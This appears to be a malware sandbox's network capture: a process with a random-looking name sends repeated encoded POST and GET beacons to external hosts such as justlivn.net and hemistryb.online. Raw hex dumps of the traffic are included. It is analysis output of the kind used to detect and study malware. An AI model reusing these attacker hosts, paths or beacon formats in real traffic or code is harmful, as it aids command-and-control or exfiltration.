                                                              Data Raw: 58 76 68 50 36 4c 3d 75 6d 58 57 63 59 54 51 68 36 6e 73 58 56 47 65 42 71 2f 6e 67 35 74 70 49 48 57 77 50 47 44 37 6a 62 75 42 6d 6b 76 6a 47 61 37 7a 72 52 56 4d 77 77 4a 65 53 30 6e 31 77 4c 7a 4c 54 45 6b 39 34 70 66 56 62 71 67 73 62 6d 35 52 4d 33 7a 6c 6d 77 4f 46 39 56 2f 31 52 46 2f 35 4a 46 7a 62 75 43 35 69 31 66 6c 6f 75 6d 64 74 79 61 45 39 67 7a 75 2f 4c 6c 50 6c 68 43 74 59 33 4b 46 31 78 34 2b 31 31 58 35 30 43 38 42 63 45 68 6a 49 6e 6e 43 5a 58 38 6f 71 76 39 61 5a 61 49 51 34 51 59 71 4a 63 32 57 69 44 49 4c 51 48 4d 31 39 61 37 69 6d 6a 71 56 46 69 59 4b 52 50 4f 54 4b 2f 48 56 73 61 59 41 68 52 38 53 38 7a 47 35 4a 64 76 77 53 69 35 49 56 66 75 39 54 6a 32 47 4a 64 30 30 2f 2f 4e 55 3d
                                                              Data Ascii: XvhP6L=umXWcYTQh6nsXVGeBq/ng5tpIHWwPGD7jbuBmkvjGa7zrRVMwwJeS0n1wLzLTEk94pfVbqgsbm5RM3zlmwOF9V/1RF/5JFzbuC5i1floumdtyaE9gzu/LlPlhCtY3KF1x4+11X50C8BcEhjInnCZX8oqv9aZaIQ4QYqJc2WiDILQHM19a7imjqVFiYKRPOTK/HVsaYAhR8S8zG5JdvwSi5IVfu9Tj2GJd00//NU=
                                                              Sep 11, 2024 22:56:14.878710985 CEST208INHTTP/1.1 200 OK
                                                              Server: nginx/1.27.0
                                                              Date: Wed, 11 Sep 2024 20:56:14 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 25
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Data Raw: 42 72 61 6e 64 20 50 61 67 65 20 43 75 73 74 6f 6d 20 44 6f 6d 61 69 6e 73
                                                              Data Ascii: Brand Page Custom Domains


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              23192.168.2.75968476.223.113.161805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:17.101314068 CEST1729OUTPOST /otqc/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.justlivn.net
                                                              Origin: http://www.justlivn.net
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.justlivn.net/otqc/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 75 6d 58 57 63 59 54 51 68 36 6e 73 58 56 47 65 42 71 2f 6e 67 35 74 70 49 48 57 77 50 47 44 37 6a 62 75 42 6d 6b 76 6a 47 61 7a 7a 72 6a 64 4d 69 68 4a 65 54 30 6e 31 2f 62 7a 4b 54 45 6b 61 34 74 7a 76 62 71 39 5a 62 6a 39 52 4d 55 72 6c 33 79 6d 46 7a 56 2f 31 5a 6c 2b 2b 4e 46 79 47 75 44 4a 6d 31 66 31 6f 75 6d 64 74 79 59 63 39 32 32 43 2f 4a 6c 50 6b 33 79 74 71 67 36 46 64 78 34 6d 6c 31 58 31 4f 43 4e 68 63 44 41 54 49 68 56 71 5a 55 63 6f 6f 75 39 62 45 61 49 64 6f 51 59 32 46 63 33 54 46 44 4b 72 51 4b 35 63 78 50 66 54 2f 79 73 49 61 70 49 69 6d 49 75 50 74 39 6d 56 54 48 50 77 66 66 2b 2b 39 39 48 31 54 59 71 46 33 38 59 42 71 58 4d 52 35 69 33 54 6a 47 32 6f 43 6c 59 33 52 42 6e 37 63 62 54 71 52 63 56 63 6b 32 72 4f 75 66 69 78 41 46 32 56 6a 5a 43 50 79 74 51 71 2b 77 71 59 50 68 66 77 4c 47 4a 32 64 35 70 73 77 76 64 67 5a 55 73 39 34 72 52 41 68 46 71 4f 55 53 69 52 68 71 52 4a 46 61 65 46 51 6e 5a 64 74 4e 74 75 48 6e 43 6c 4f 37 49 39 4e 2b 58 62 74 52 69 4a [TRUNCATED]
                                                              Data Ascii: XvhP6L=umXWcYTQh6nsXVGeBq/ng5tpIHWwPGD7jbuBmkvjGazzrjdMihJeT0n1/bzKTEka4tzvbq9Zbj9RMUrl3ymFzV/1Zl++NFyGuDJm1f1oumdtyYc922C/JlPk3ytqg6Fdx4ml1X1OCNhcDATIhVqZUcoou9bEaIdoQY2Fc3TFDKrQK5cxPfT/ysIapIimIuPt9mVTHPwff++99H1TYqF38YBqXMR5i3TjG2oClY3RBn7cbTqRcVck2rOufixAF2VjZCPytQq+wqYPhfwLGJ2d5pswvdgZUs94rRAhFqOUSiRhqRJFaeFQnZdtNtuHnClO7I9N+XbtRiJOLcqWyC4C0f2pyUzf+o5hPspHIwr6xwf+03K/c8vRzzwIO7WC2i9jojtrtUBSQIBOb2f+9ZJgDOFpSOH918Qb8H9vlScF4KobVobhSd+GB0+i8RyvBtpO9us6qN/8mKLA2K3EwlqTgu1CCFhvO+gGv9+6+qqbXRHo5E3kvsapO6bMmOk/TdHivST/BGfJEed+Thh0OJXMetjzX59kKwh72Ny/0We4lazuh4ZBsq7Fb2+hwLdRuLpMirgAR88n/c91vvd9Hc9lfEZSmSMdgTfujz5YqrZRAe30oyoaitgapQMqyjBgu17NKc575p/sluXhAs0RFCcT0Iva5zQ9Y0qda4NnM79Nu2HnOXuRrvY+5sZPkFT80V0Gc+d/TvD/PcaNEoIqJ2fpYdkY8nvC7QxqFD/CmkoXO/ntUEDJE6yDZUnbmA6Sra5/X1BpZcKbxK3QgrCtVRJJgmmFq+FMBWVleRJZe08/Rj7/q6wk0P5OMU0PHZsUPN24jVYBkGQIj8+FowcH5lUoUzgfbvB8RZYnHfXFP9CRXtjFDl/xWZ5TX/F6M26gegfKzMUlNAvZLVWyMJFxGyp1qmnxrsM40gLpyHoytl367G8gv7bZVPchI95UyrBfdQc4txTZRoE2EcNVRvZuGy9U129FCYszckK/5E0dLJP/FClOy [TRUNCATED]
                                                              Sep 11, 2024 22:56:17.543169022 CEST208INHTTP/1.1 200 OK
                                                              Server: nginx/1.27.0
                                                              Date: Wed, 11 Sep 2024 20:56:17 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 25
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Data Raw: 42 72 61 6e 64 20 50 61 67 65 20 43 75 73 74 6f 6d 20 44 6f 6d 61 69 6e 73
                                                              Data Ascii: Brand Page Custom Domains


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              24192.168.2.75968576.223.113.161805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:19.644325018 CEST440OUTGET /otqc/?XvhP6L=jk/2fo7CpY6PXlaYArzRtoo0AVLLUFDN/Jq+vkOaZ+fPrhUhiTNdX0aA543JRHsuzYf7ebB3TDQsHlnmoSav9wzbQDyRMAafsyNd6ddZozZF1KxmmUfcLkKv5xld9bF92o+2nx1DI9Jm&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.justlivn.net
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:56:20.095751047 CEST208INHTTP/1.1 200 OK
                                                              Server: nginx/1.27.0
                                                              Date: Wed, 11 Sep 2024 20:56:20 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 25
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Data Raw: 42 72 61 6e 64 20 50 61 67 65 20 43 75 73 74 6f 6d 20 44 6f 6d 61 69 6e 73
                                                              Data Ascii: Brand Page Custom Domains


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              25192.168.2.759686172.67.221.5805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:25.159265995 CEST708OUTPOST /d4mx/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.hemistryb.online
                                                              Origin: http://www.hemistryb.online
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.hemistryb.online/d4mx/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 51 61 57 38 62 6c 4f 35 39 53 63 73 66 69 55 53 47 6f 65 4e 64 50 77 2b 30 4f 7a 51 61 49 78 4f 61 46 65 63 67 53 44 36 35 50 6e 59 6b 47 34 35 66 55 74 50 30 73 35 30 56 30 77 75 75 53 76 6c 6e 37 31 55 64 4a 4d 78 35 6b 67 4c 71 4f 4c 54 65 46 42 62 73 56 75 52 6b 75 46 2b 47 57 77 49 58 2b 6e 4a 35 4b 6c 37 44 67 70 67 41 67 51 57 72 5a 79 35 73 6c 73 38 4d 41 50 61 58 31 4e 49 32 59 59 39 64 47 35 32 73 74 53 70 7a 63 30 45 66 49 44 7a 72 54 46 63 46 69 47 51 4c 51 78 71 45 77 2b 73 49 44 76 33 6e 6f 75 6e 42 7a 57 6f 62 6c 4f 68 43 48 2f 45 6d 65 76 6b 53 58 68 38 63 73 30 71 6c 56 6e 75 54 56 61 4f 51 37 4a 4c 52 77 3d 3d
                                                              Data Ascii: XvhP6L=QaW8blO59ScsfiUSGoeNdPw+0OzQaIxOaFecgSD65PnYkG45fUtP0s50V0wuuSvln71UdJMx5kgLqOLTeFBbsVuRkuF+GWwIX+nJ5Kl7DgpgAgQWrZy5sls8MAPaX1NI2YY9dG52stSpzc0EfIDzrTFcFiGQLQxqEw+sIDv3nounBzWoblOhCH/EmevkSXh8cs0qlVnuTVaOQ7JLRw==
                                                              Sep 11, 2024 22:56:25.850508928 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:56:25 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-ray: wnp32840:0.000/wn32840:0.000/wa32840:D=595
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2B8Bx%2FvD%2BD58gbtVfOPIMqiEsPHnxZn9TZSuLJMW7WKUSODGh77EZCfzQwAxgE6FG1o5jy1s7F0cipLj57WwOs1xY9aTRjHVMqJ6loSs3Dc96mbQwxlMn5IlyE4Ap4loFYyp0aAALw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c1a9077a8e942fe-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Raw: 32 64 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9c 55 4f 6f d3 30 14 bf ef 53 3c 82 a0 20 9a 25 ed 5a 3a 42 52 38 71 e5 00 9c 91 9b bc b4 66 8e 1d d9 6e d7 82 26 6d 9a c4 89 33 37 24 3e c2 84 a8 10 12 db 67 70 be 11 72 9a 76 eb df 0d 7c 88 1d bf e7 f7 7e fe f9 67 bf f0 5e 22 62 3d c9 11 06 3a 63 dd bd 70 de 21 49 ba 7b 00 00 a1 a6 9a 61 b7 e5 b7 c0 7c 33 53 30 bf cc a5 b9 30 bf cd 4f 33 35 97 e6 2a f4 66 0e 33 e7 0c 35 81 78 40 a4 42 1d 39 ef de be 72 0f 9d 9b 26 4e 32 8c 9c 11 c5 e3 5c 48 ed 40 2c b8 46 ae 23 e7 98 26 7a 10 25 38 a2 31 ba e5 cf 7c 1d a3 fc 08 06 12 d3 a8 36 d0 3a 57 81 e7 a5 82 6b b5 df 17 a2 cf 90 e4 54 ed c7 22 f3 62 a5 5e a4 24 a3 6c 12 bd ce 91 3f 79 43 b8 0a 5a be 5f ef f8 fe 43 35 ec 59 44 8c 68 ca eb f1 44 52 c6 68 5c 03 89 2c aa 29 3d 61 a8 06 88 ba 06 96 8a a8 a6 71 ac 6d bc 5a 05 a1 f4 98 8d 6d eb 89 64 52 2f 09 83 4f 8b 49 db 06 48 fb 03 1d 40 c3 f7 1f 3c 5f b2 64 44 f6 29 0f c0 5f 9e 4e a8 ca 19 99 04 90 32 1c 2f 9b 3e 0c 95 a6 e9 c4 ad 18 0a 20 46 ae 51 2e 3b 11 46 fb dc [TRUNCATED]
                                                              Data Ascii: 2deUOo0S< %Z:BR8qfn&m37$>gprv|~g^"b=:cp!I{a|3S00O35*f35x@B9r&N2\H@,F#&z%81|6:WkT"b^$l?yCZ_C5YDhDRh\,)=aqmZmdR/OIH@<_dD)_N2/> FQ.;F3GC`Bp?m6tZVld3bYjR["\%d1(WXhn,\QVm?_m-Zgjc%CN04-[@)|ooD|<k&.:IzynUORLV`"l1|aB<x}a>~sn\MXSa!0~U}J)u8R8XmR
                                                              Sep 11, 2024 22:56:25.850532055 CEST176INData Raw: dd 20 45 32 d4 e2 8e 70 d6 2f cd ad b1 ee 0c e8 86 cc 1a fe da be 4e 56 44 17 7a d5 a3 1a 7a b3 5a 13 da 57 b5 bb 17 26 74 04 31 23 4a 45 ce 02 f7 bc 14 6c b2 95 7b 72 ae 1f e7 50 e5 84 cf bd ae ef 9a 63 2b 58 e8 59 e3 4e df 04 55 2c 69 6e 75 e0
                                                              Data Ascii: E2p/NVDzzZW&t1#JEl{rPc+XYNU,inut .p+tw3-8s!s\?9gfZ[|kUzeqa]G0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              26192.168.2.759687172.67.221.5805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:27.713248014 CEST728OUTPOST /d4mx/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.hemistryb.online
                                                              Origin: http://www.hemistryb.online
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.hemistryb.online/d4mx/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 51 61 57 38 62 6c 4f 35 39 53 63 73 4e 54 6b 53 56 37 32 4e 61 76 77 39 34 75 7a 51 55 6f 77 48 61 46 53 63 67 54 47 68 36 35 2f 59 6c 69 38 35 65 56 74 50 33 73 35 30 53 45 78 6b 71 53 76 73 6e 37 34 72 64 49 77 78 35 6b 6b 4c 71 4f 62 54 5a 32 70 45 73 46 75 66 69 75 46 38 43 57 77 49 58 2b 6e 4a 35 4f 4e 56 44 67 78 67 41 51 67 57 71 34 79 32 7a 56 73 2f 50 41 50 61 63 56 4e 4d 32 59 59 66 64 45 4e 51 73 6f 4f 70 7a 64 45 45 66 5a 44 30 79 6a 45 56 59 53 48 64 42 7a 55 75 61 51 53 43 4a 7a 7a 68 69 2f 61 6c 41 46 4c 4b 42 48 43 4e 63 57 48 2f 69 63 4c 53 46 78 38 4a 65 74 77 79 6f 33 54 50 4d 69 2f 6b 64 70 6f 50 48 43 4d 71 63 47 31 46 78 34 55 73 75 63 39 4b 62 4d 6d 2f 38 42 77 3d
                                                              Data Ascii: XvhP6L=QaW8blO59ScsNTkSV72Navw94uzQUowHaFScgTGh65/Yli85eVtP3s50SExkqSvsn74rdIwx5kkLqObTZ2pEsFufiuF8CWwIX+nJ5ONVDgxgAQgWq4y2zVs/PAPacVNM2YYfdENQsoOpzdEEfZD0yjEVYSHdBzUuaQSCJzzhi/alAFLKBHCNcWH/icLSFx8Jetwyo3TPMi/kdpoPHCMqcG1Fx4Usuc9KbMm/8Bw=
                                                              Sep 11, 2024 22:56:28.425606966 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:56:28 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-ray: wnp32840:0.000/wn32840:0.000/wa32840:D=894
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I%2FPYBh6H0Q5SOHN0EnsLhWcpHP1V7JQPSZ9nLMbTaX95j%2FZO8FtAMnGCUvxDIuh1QOPtQ4CxNV9IYoJZLyrkU%2FY9etjyR8ElIVYf2lZ17RjSioac8BA7iksPiztKtd2pHaRaaGc%2BDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c1a9087cb3c7d0b-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Raw: 32 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9c 55 4f 6f d3 30 14 bf ef 53 3c 82 a0 20 9a 25 ed 5a 3a 42 52 38 71 e5 00 9c 91 9b bc b4 66 8e 1d d9 6e d7 82 26 6d 9a c4 89 33 37 24 3e c2 84 a8 10 12 db 67 70 be 11 72 9a 76 eb df 0d 7c 88 1d bf e7 f7 7e fe f9 67 bf f0 5e 22 62 3d c9 11 06 3a 63 dd bd 70 de 21 49 ba 7b 00 00 a1 a6 9a 61 b7 e5 b7 c0 7c 33 53 30 bf cc a5 b9 30 bf cd 4f 33 35 97 e6 2a f4 66 0e 33 e7 0c 35 81 78 40 a4 42 1d 39 ef de be 72 0f 9d 9b 26 4e 32 8c 9c 11 c5 e3 5c 48 ed 40 2c b8 46 ae 23 e7 98 26 7a 10 25 38 a2 31 ba e5 cf 7c 1d a3 fc 08 06 12 d3 a8 36 d0 3a 57 81 e7 a5 82 6b b5 df 17 a2 cf 90 e4 54 ed c7 22 f3 62 a5 5e a4 24 a3 6c 12 bd ce 91 3f 79 43 b8 0a 5a be 5f ef f8 fe 43 35 ec 59 44 8c 68 ca eb f1 44 52 c6 68 5c 03 89 2c aa 29 3d 61 a8 06 88 ba 06 96 8a a8 a6 71 ac 6d bc 5a 05 a1 f4 98 8d 6d eb 89 64 52 2f 09 83 4f 8b 49 db 06 48 fb 03 1d 40 c3 f7 1f 3c 5f b2 64 44 f6 29 0f c0 5f 9e 4e a8 ca 19 99 04 90 32 1c 2f 9b 3e 0c 95 a6 e9 c4 ad 18 0a 20 46 ae 51 2e 3b 11 46 fb dc [TRUNCATED]
                                                              Data Ascii: 2e8UOo0S< %Z:BR8qfn&m37$>gprv|~g^"b=:cp!I{a|3S00O35*f35x@B9r&N2\H@,F#&z%81|6:WkT"b^$l?yCZ_C5YDhDRh\,)=aqmZmdR/OIH@<_dD)_N2/> FQ.;F3GC`Bp?m6tZVld3bYjR["\%d1(WXhn,\QVm?_m-Zgjc%CN04-[@)|ooD|<k&.:IzynUORLV`"l1|aB<x}a>~sn\MXSa!0~U}J)u8R8X
                                                              Sep 11, 2024 22:56:28.425683022 CEST173INData Raw: 6d 52 dd 20 45 32 d4 e2 8e 70 d6 2f cd ad b1 ee 0c e8 86 cc 1a fe da be 4e 56 44 17 7a d5 a3 1a 7a b3 5a 13 da 57 b5 bb 17 26 74 04 31 23 4a 45 ce 02 f7 bc 14 6c b2 95 7b 72 ae 1f e7 50 e5 84 cf bd ae ef 9a 63 2b 58 e8 59 e3 4e df 04 55 2c 69 6e
                                                              Data Ascii: mR E2p/NVDzzZW&t1#JEl{rPc+XYNU,inut .p+tw3-8s!s\?9gfZ[|kUzeq]G0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              27192.168.2.759688172.67.221.5805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:30.255604029 CEST1741OUTPOST /d4mx/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.hemistryb.online
                                                              Origin: http://www.hemistryb.online
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.hemistryb.online/d4mx/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 51 61 57 38 62 6c 4f 35 39 53 63 73 4e 54 6b 53 56 37 32 4e 61 76 77 39 34 75 7a 51 55 6f 77 48 61 46 53 63 67 54 47 68 36 35 48 59 6b 52 30 35 66 32 46 50 32 73 35 30 64 55 78 6e 71 53 75 2b 6e 37 67 76 64 49 38 4c 35 6d 73 4c 72 74 44 54 59 48 70 45 35 31 75 66 76 4f 46 78 47 57 77 52 58 2b 33 4e 35 4b 68 56 44 67 78 67 41 53 34 57 71 70 79 32 6f 56 73 38 4d 41 50 47 58 31 4e 67 32 59 51 6c 64 45 49 74 73 63 43 70 39 64 55 45 63 76 58 30 74 54 45 62 62 53 47 4f 42 7a 6f 68 61 51 2b 4f 4a 77 76 50 69 34 32 6c 42 54 4b 50 53 33 47 68 44 33 6e 48 73 4d 69 77 54 43 74 2f 57 73 59 36 75 48 71 68 4a 77 58 57 5a 6f 34 46 4f 32 6c 32 44 32 42 45 35 61 63 65 69 61 49 76 4b 65 2b 7a 72 30 35 4b 6e 6b 4b 51 4f 70 34 70 75 47 4b 6e 43 37 54 55 6b 49 39 4f 36 56 38 35 71 4a 6f 70 71 6d 6e 50 53 31 61 58 35 6e 4b 51 59 56 64 61 54 69 62 44 43 4f 68 47 32 68 64 43 6c 39 45 61 33 48 4b 54 5a 75 68 5a 4a 50 2b 48 44 32 75 77 65 67 69 75 59 42 5a 64 62 56 6e 70 6b 73 78 68 39 4f 44 35 6f 47 50 [TRUNCATED]
                                                              Data Ascii: XvhP6L=QaW8blO59ScsNTkSV72Navw94uzQUowHaFScgTGh65HYkR05f2FP2s50dUxnqSu+n7gvdI8L5msLrtDTYHpE51ufvOFxGWwRX+3N5KhVDgxgAS4Wqpy2oVs8MAPGX1Ng2YQldEItscCp9dUEcvX0tTEbbSGOBzohaQ+OJwvPi42lBTKPS3GhD3nHsMiwTCt/WsY6uHqhJwXWZo4FO2l2D2BE5aceiaIvKe+zr05KnkKQOp4puGKnC7TUkI9O6V85qJopqmnPS1aX5nKQYVdaTibDCOhG2hdCl9Ea3HKTZuhZJP+HD2uwegiuYBZdbVnpksxh9OD5oGPNUnDtswiJuAslUK1Ypxu39N9Mmvwu2eymbfeaHetQCshKyhMl242npMdwt0X5/IQ0yqRersq6MJVltQ+ARv0Due1CWo+fa0DT6u1kIPvI7XS9hBaYIzAIOmXXQ+oeezs0pyffyPpRQaTMPOD4lS82t7+a+lsSq1rTm6xMemFnq0NcWWLFEM1moppbPJoGN1q4O1sdlf0Mk92BJMrdtMHNAWAANQkZU9Xd0SMwOIaNlzc2Jf+ntySY7MudSg9LgSrdd8noNbofLHwY1TCSz9VLqX9edF1t2xkc008fsRlArUDMO6tgiP9iUYWkRXQ3vN88rU7+oQ/pviWXR51SfYk2GHVq+NZpT9B7TaK+2mb+U9VWTYOVYVkL30ThMwHjupTSvk5PmvZxYY5TqekUCCTa9qMgIabljKblZByfmKWh1hrH88bTgdeSwlEwy0OeZuRmSg3bjQQms7lWVOxK4kOahfO7hDv7leQr4gpvOVMV2KklWQtXPuyH91hrpbs8GzOsJPHCPVNGqR2HB52l0Eov9DLgdq3G6cgFXClIWwadrdBKAZjv2dElyatVa85JVlz8KbHMALLvOEz9ZOOhJY5Cf0+O4snWHV7fuPheJ7v02cgbTJzBsTViM/eh4eHbPMFrWw/bfNPkA9EmhDhCA/TFGcM+WiQHbq1r8 [TRUNCATED]
                                                              Sep 11, 2024 22:56:30.947381020 CEST677INHTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:56:30 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-ray: wnp32840:0.000/wn32840:0.000/wa32840:D=866
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XcmG%2BstF6QGZ3oibJ9DO34QDsAYaexsuimzHvXyKGaxujZHsa84k92L54bVeYZc%2FHvuRSlXSbKLUXGlfbRYz9G%2BBfBAnZ386APMZYl%2BL4qmoArx%2F1BhPTfVbFzbnOM9WEQB%2FDN3zaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c1a90978c0d72a7-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400
                                                              Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                              Data Ascii: f
                                                              Sep 11, 2024 22:56:30.949126005 CEST751INData Raw: 32 64 34 0d 0a 9c 55 4f 6f d3 30 14 bf ef 53 3c 82 a0 20 9a 25 ed 5a 3a 42 52 38 71 e5 00 9c 91 9b bc b4 66 8e 1d d9 6e d7 82 26 6d 9a c4 89 33 37 24 3e c2 84 a8 10 12 db 67 70 be 11 72 9a 76 eb df 0d 7c 88 1d bf e7 f7 7e fe f9 67 bf f0 5e 22 62
                                                              Data Ascii: 2d4UOo0S< %Z:BR8qfn&m37$>gprv|~g^"b=:cp!I{a|3S00O35*f35x@B9r&N2\H@,F#&z%81|6:WkT"b^$l?yCZ_C5YDhDRh\,


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              28192.168.2.759689172.67.221.5805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:32.800508976 CEST444OUTGET /d4mx/?XvhP6L=dY+cYSKR0CxOBgdKC/uIXP8qwtWtKpkmZkr6gQOthvr2txBeH3FPzsd2b0Ib6yOB9b4SVKkLzFRco8LgeUNZml6ApuBXHFQ5XcnL1KhmECBVWCNPjbmPvAwvE3fQeXhC94EGXV5DutCK&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.hemistryb.online
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:56:33.494874954 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:56:33 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-ray: wnp32840:0.000/wn32840:0.000/wa32840:D=823
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VCZ9v4TUbt7AbR44Bt%2BkbYCYMDuKjeZjJUhkrraEHezn7XGRcKR34nlimyoDOQejofREhwW%2BfnAkRJwRG0eB74D61rB0rvT9omMliDCl2sFvXmNAbbHPhGKp1WH3HxuiZbeQMe3yrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c1a90a77df442ca-EWR
                                                              alt-svc: h3=":443"; ma=86400
